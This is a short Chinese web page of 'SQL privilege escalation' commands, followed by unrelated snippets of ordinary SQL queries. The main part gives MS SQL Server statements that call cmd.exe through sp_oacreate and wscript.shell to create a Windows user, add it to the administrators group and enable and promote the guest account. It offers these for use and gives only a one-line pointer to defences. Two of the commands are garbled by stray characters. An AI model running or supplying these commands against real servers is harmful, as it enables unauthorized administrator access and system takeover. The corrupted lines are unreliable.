SQL 提權 常用命令

2022-09-25 05:24:09 字數 919 閱讀 6434

1、連線資料庫fkqhfasd

driver=;server=伺服器ip;uid=使用者名稱;pwd=密碼;database=資料庫名

2、新增新使用者

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_o @shell,'ru',null,'c:\windows\system32\cmd.exe /c net user 新使用者 密碼 /add'

3、把使用者加到管理組

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oafkqhfasdmethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 新使用者 /add'

4、啟用guest使用者

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user guest /active:yes'

5、把guest加到管理組

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators guest /add'

關於防範方法,可以參考我們伺服器安全設定欄目。

本文標題: sql 提權 常用命令

本文位址:

SQL常用命令

sql常用命令 資料的增刪改查 增加資料 插入資料 insert into 表名 字段 字段 values 值,值,值.按需要字段填寫 insert into 表名 values 值,值,值.插入全部字段,自動增長列不寫 刪除資料 記得有外來鍵先刪除主鍵表裡的相應內容 刪除表裡的內容 delete ...

SQL常用命令

a b兩表,找出id欄位中,存在a表,但是不存在b表的資料。a表總共13w資料,去重後大約3w條資料,b表有2w條資料,且b表的id欄位有索引。使用 not in 容易理解,效率低 執行時間為 1.395秒 select 種類,sum 數量 from 表名 group by 種類 order by ...

SQL常用命令

返回某個表的列資訊 exec sp clomuns 表名 檢視某個表的所有資訊 exec sp help 表名 查詢資料庫中所有含有某一列的所有表 select name from sysobjects where id in select id from syscolumns where sysc...